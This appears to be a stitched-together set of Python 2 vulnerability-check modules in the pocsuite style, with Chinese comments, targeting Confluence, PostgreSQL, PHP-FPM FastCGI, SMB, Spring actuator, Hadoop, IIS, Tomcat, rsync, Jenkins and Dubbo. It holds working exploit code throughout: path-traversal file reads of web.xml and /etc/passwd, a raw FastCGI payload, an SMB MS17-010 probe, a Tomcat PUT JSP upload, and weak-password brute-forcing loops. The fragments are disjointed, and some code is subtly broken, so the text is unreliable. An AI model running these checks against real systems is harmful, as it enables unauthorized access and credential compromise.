def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
def _verify(self):
#调用指纹方法
result = {}
output = Output()
filename = "../web.xml"
limitSize = 1000
paylaod = self.url + "/rest/tinymce/1/macro/preview"
headers = {
"User-Agent":
"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
"Referer": self.url,
"Content-Type": "application/json; charset=utf-8"
}
data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
r = requests.post(paylaod, data=data, headers=headers)
if r.status_code == 200 and "</web-app>" in r.text:
m = re.search('<web-app[\s\S]+<\/web-app>', r.text)
if m:
content = m.group()[:limitSize]
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = filename
result['VerifyInfo']['Payload'] = content
#print result
return self.save_output(result)
def _verify(self):
import psycopg2
#调用指纹方法
result = {}
passwd = [
'123456', 'admin', 'root', 'password', '123123', '123', '1', '',
'{user}', '{user}{user}', '{user}1', '{user}123', '{user}2016',
'{user}2015', '{user}!', 'P@ssw0rd!!', 'qwa123', '12345678',
'test', '123qwe!@#', '123456789', '123321', '1314520', '666666',
'woaini', 'fuckyou', '000000', '1234567890', '8888888', 'qwerty',
'1qaz2wsx', 'abc123', 'abc123456', '1q2w3e4r', '123qwe', '159357',
'p@ssw0rd', 'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1',
'r00t', 'system', '111111', 'admin'
]
import re
from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', self.url)
if len(_port) != 0:
_host = url2ip(self.url)[0]
_port = url2ip(self.url)[1]
else:
_host = url2ip(self.url)
_port = "5432"
print _host, _port
import socket
sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sk.settimeout(1)
try:
sk.connect((_host, _port))
#print 'Server port is OK!'
except Exception:
print 'port not alive'
return self.save_output(result)
sk.close()
output = Output(self)
message = ''
for pwd in passwd:
try:
pwd = pwd.replace('{user}', 'postgres')
conn = psycopg2.connect(host=_host,
port=_port,
user='******',
password=pwd)
message = u' {} 5432端口 Postgresql 存在弱口令: postgres {}'.format(
_host, pwd)
print "有弱口令漏洞"
conn.close()
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = self.url
result['VerifyInfo']['Payload'] = message
break
except Exception as e:
print e
print '[+]29 poc done'
return self.save_output(result)
def _verify(self):
ip = self.url.split(':')[1].replace('/', '')
import socket
#import psycopg2
#调用指纹方法
result = {}
output = Output(self)
message = ''
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5.0)
sock.connect((ip, 9000))
data = """
01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53
54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52
56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50
2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49
50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f
70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
"""
data_s = ''
for _ in data.split():
data_s += chr(int(_, 16))
sock.send(data_s)
try:
ret_data = sock.recv(1024)
if ret_data.find(':root:') > 0:
print ret_data
print(ip + 'fastcgi read file vul')
message = ip + 'fastcgi read file vul'
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = ip
result['VerifyInfo']['Payload'] = message
print '%s is vulnerable!' % ip
return True
else:
print '没有发现 :root: 特征字'
return False
except Exception as e:
print 'socket连接失败'
pass
sock.close()
return self.save_output(result)
def parse_result(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("Internet Nothing returned")
return output
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet noting return')
return output
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not vulnerability')
return output
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('失败')
return output
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
def parse_output(self,result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("someting error")
return output
def parse_output(self, result):
# parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
def parse_output(self, result):
print 'parse_output'
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed connect')
return output
def parse_attack(self, response):
output = Output(self)
result = {}
if response:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '%s' % self.url
output.success(result)
else:
output.fail('Fail test')
return output
def _verify(self):
# 调用指纹方法
result = {}
output = Output(self)
import socket
import binascii
vul_ip = self.url
vul_ip = vul_ip[7:]
print vul_ip
negotiate_protocol_request = binascii.unhexlify(
"00000054ff534d42720000000018012800000000000000000000000000002f4b0000c55e003100024c414e4d414e312e3000024c4d312e325830303200024e54204c414e4d414e20312e3000024e54204c4d20302e313200"
)
session_setup_request = binascii.unhexlify(
"00000063ff534d42730000000018012000000000000000000000000000002f4b0000c55e0dff000000dfff02000100000000000000000000000000400000002600002e0057696e646f7773203230303020323139350057696e646f7773203230303020352e3000"
)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect((vul_ip, 445))
s.send(negotiate_protocol_request)
s.recv(1024)
s.send(session_setup_request)
data = s.recv(1024)
user_id = data[32:34]
tree_connect_andx_request = "000000%xff534d42750000000018012000000000000000000000000000002f4b%sc55e04ff000000000001001a00005c5c%s5c49504324003f3f3f3f3f00" % (
(58 + len(vul_ip)), user_id.encode('hex'),
vul_ip.encode('hex'))
s.send(binascii.unhexlify(tree_connect_andx_request))
data = s.recv(1024)
allid = data[28:36]
payload = "0000004aff534d422500000000180128000000000000000000000000%s1000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00" % allid.encode(
'hex')
s.send(binascii.unhexlify(payload))
data = s.recv(1024)
s.close()
if "\x05\x02\x00\xc0" in data:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = vul_ip
s.close()
except Exception as e:
print e
print '[+]36 poc done'
return self.save_output(result)
def _verify(self):
#调用指纹方法
result = {}
output = Output()
payload = ['trace','env','health','info']
for i in payload:
vul_url = '{}/{}'.format(self.url, i)
try:
resp = req.get(url=vul_url, timeput=3, verify=False)
if resp.headers['Content-Type'] and 'application/json' in resp.headers['Content-Type'] and len(resp.content)> 500:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = vul_url
result['VerifyInfo']['Payload'] = 'path:{}'.format(i)
break
except Exception as e:
pass
print '[+]58 poc done'
return self.save_output(result)
def _verify(self):
result = {}
output = Output(self)
target_ip = url2ip(self.url)
url = urlparse.urlparse(self.url)
port = url.port or 443
if check_poodle(target_ip, port):
output.success(result)
else:
output.fail('Not support SSLv3 connection. Not Vulnerable')
return output
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
#生产报告错误,在这里记得
#data = result['VerifyInfo']['URL'] + result['VerifyInfo']['whoami'] + "\n"
#with open('result.txt','a+') as f:
# f.write(str(data))
else:
output.fail()
return output
def _verify(self):
# 调用指纹方法
result={}
output = Output(self)
scan_ports = {
"50070", #dfs.namenode.http-address
"50470", #dfs.namenode.https-address
"50105", #dfs.namenode.backup.http-address
"50090", #dfs.namenode.secondary.http-address
"50091", #dfs.namenode.secondary.https-address
"50075", #dfs.datanode.http.address
"50475", #dfs.datanode.https.address
"8480", #dfs.journalnode.http-address
"8088", #yarn.resourcemanager.webapp.address
"8090", #yarn.resourcemanager.webapp.https.address
"8042", #yarn.nodemanager.webapp.address
"8188", #yarn.timeline-service.webapp.address
"19888", #mapreduce.jobhistory.webapp.address
"60010", #hbase.master.info.port, HMaster的http端口
"60030",#hbase.regionserver.info.port HRegionServer的http端口
}
vul_port = []
for i in scan_ports:
#print i
vul_url = '%s:%s' % (self.url,i)
try:
response = req.get(str(vul_url), timeout=1).text
#print response
if "hbase" in response.lower() or\
"url=/rs-status" in response.lower() or\
"hadoop" in response.lower():
vul_port.append(i)
except:
#print e
pass
if vul_port.__len__() > 0:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = self.url
result['VerifyInfo']['Payload'] = "port:" + str(vul_port)
print '[+]28 poc done'
return self.save_output(result)
def _verify(self):
result = {}
output = Output(self)
# ip
ip = url2ip(self.url)
#port
import re
_port = re.findall(':(\d+)\s*', self.url)
if len(_port) != 0:
_port = url2ip(self.url)[1]
else:
_port = 80
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect((ip, int(_port))) # ip port
flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"
sock.send(flag)
try:
data = sock.recv(1024)
if 'Requested Range Not Satisfiable' in data and 'Server: Microsoft' in data:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = ip
result['VerifyInfo']['Payload'] = ip + 'fastcgi read file vul'
return self.save_output(result)
except:
print '连接失败'
pass
sock.close()
# print '-' * 18 + '\n'
print data
def _verify(self):
#ip = self.url.split(':')[1].replace('/', '')
#import psycopg2
testurl = (self.url + '/myfile.jsp/').replace('//m', '/m')
testdata = """<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>"""
result = {}
output = Output(self)
message = ''
print(testurl)
try:
r1 = req.put(testurl, testdata, timeout=3) #3秒超时
r2 = req.get(testurl.replace(".jsp/", ".jsp"))
print('响应包长度:')
print(r2.content.__len__())
if r2.content.find('successfully.') > 0:
message = testurl + 'Tomcat uploadfile vulnerability'
print(message)
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = testurl
result['VerifyInfo']['Payload'] = testdata
print '%s is vulnerable!' % testurl
return True
else:
print '没有发现关键字:successfully. '
return False
except Exception as e:
print '连接失败'
pass
return self.save_output(result)
def _verify(self):
import socket
#调用指纹方法
result = {}
output = Output(self)
message = ''
try:
s = socket.socket()
socket.setdefaulttimeout(1) #两秒超时
port = 873
ip = self.url.split(':')[1].replace('/', '')
s.connect((ip, port))
print('Rsync未授权访问')
message = 'Rsync 873端口 未授权访问'
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = ip
result['VerifyInfo']['Payload'] = message
except Exception as e:
print(e)
s.close()
print '[+]30 poc done'
return self.save_output(result)
def _verify(self):
result = {}
#获取漏洞url
#如果设置端口则取端口,没有设置则为默认端口
import re
vul_url = "%s" % self.url
# from pocsuite.lib.utils.funs import url2ip
_port = re.findall(':(\d+)\s*', vul_url)
if len(_port) != 0:
_host = url2ip(vul_url)[0]
_port = url2ip(vul_url)[1]
else:
_host = url2ip(vul_url)
_port = "8080"
vul_ip = "http://%s:%s" % (_host, _port)
import hashlib
# 会话保持
output = Output(self)
file_name = "windows/win"
BACKDIR_COUNT = 8
header = {'Accept-Language': ('../' * BACKDIR_COUNT) + file_name}
try:
vulurl = vul_ip + '/plugin/credentials/.ini'
vulurltest = req.get(vulurl, headers=header)
if "MPEGVideo" in vulurltest.text:
if vulurltest.text.find('version'):
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = vulurl
result['VerifyInfo']['Payload'] = header
except Exception as e:
pass
return self.save_output(result)
def _verify(self):
# 调用指纹方法
result = {}
output = Output(self)
import socket
import telnetlib
import base64
# 默认端口 web 8080 telnet 7070 但是很多dubbo自定义了端口,以下是其他比较常见的dubbo可能存在的端口
unauth_ports = { #用于探测 1、直接未授权访问 2、basic 弱口令登录
"80",
"443",
"8080", #default port test demo 1.1.1.1
# "8081",
# "8082",
# "8083",
# "8084",
# "8086",
"8088",
"8888",
# "8089",
# "8090",
"8000", # default pwd test :http://1.1.1.1:8000/
# "9080",
# "9090",
# "9999",
# "18080",
# "28080",
}
default_account = { #默认账号检测 default root/root(admin) guest /guest
"root",
#"admin",
"guest",
}
default_pwd = { #默认密码检测
"root",
#"admin",
"guest",
}
telnet_ports = {
"7070", #default port 1.1.1.1
# "1234",
# "8000",
"10001",
# "9999",
# "19999",
# "29999",
# "20000",
# "18080",
# "28080",
# "6060",
# "8084",
# "12345",
}
vul_port = []
#step 1 http 以及弱口令
for p in unauth_ports:
url = '%s:%s' % (self.url, p)
try:
resp = req.get(str(url), timeout=1)
#print resp.text
if "<title>dubbo</title>" in resp.text.lower():
vul_port.append(p)
elif resp.headers[
"www-authenticate"] == "Basic realm=\"dubbo\"":
#print "get basic"
#vul_port.append(p)
#构造弱口令爆破
for user in default_account:
for pwd in default_pwd:
verify_str = user + ":" + pwd
#print verify_str
verify_str = base64.b64encode(verify_str)
basic_auth = {
'Authorization': 'BASIC ' + verify_str
}
#print verify_str
httpreq = req.session()
raa = httpreq.get(url,
headers=basic_auth,
timeout=1)
#print raa.text
#print raa.status_code
if 200 == raa.status_code:
#print "get weak pwd"
py = p + ':(' + user + '|' + pwd + ')'
vul_port.append(py)
except Exception, e:
#print e
pass
# coding: utf-8
def _verify(self):
result = {}
output = Output(self)
port = ""
vul_url = '%s' % self.url
password = [
'123456', 'admin', 'root', 'password', '123123', '123', '1', '',
'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#',
'123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou',
'000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123',
'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd',
'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t',
'system', '111111', 'admin'
]
user = ["root", "admin", "tomcat", "Tomcat", "test", "manager"]
list_a = [8080, 8090, 9080, 9090, 80] #tomcat常见端口列表
for one_port in list_a:
try:
is_tomcat_url = (
vul_url + ":" +
str(one_port)).strip("/").strip("/").strip(":")
#"/manager/html").replace('//mana','/')
print is_tomcat_url
reponse = req.get(is_tomcat_url, timeout=3)
if ("installed Tomcat. Congratulations!" in reponse.text):
port = str(one_port)
print '发现特征,确定Tomcat端口:' + port
vul_url = is_tomcat_url
print "确定vul_url" + vul_url
break
else:
print "not:" + str(one_port)
except Exception as e:
print e
pass
if (port == ""):
print '无漏洞,未发现tomcat端口'
return self.save_output(result)
#确定port和vul_url了
vul_url = vul_url + "/manager/html"
print "final" + vul_url
#http://1.1.1.1:9080:9080/manager/html
import base64
#import time
for u in user:
for p in password:
try:
#time.sleep(2)
header = {
"User-Agent":
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0",
"Authorization":
" Basic " + base64.b64encode(("%s:%s") % (u, p))
}
print '当前 ' + u + ":" + p
reponse = req.get(vul_url, timeout=5, headers=header)
if ("Tomcat Web Application Manager" in reponse.text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = u + ":" + p
except Exception as e:
print e
pass
print '[+]34 poc done'
return self.save_output(result)
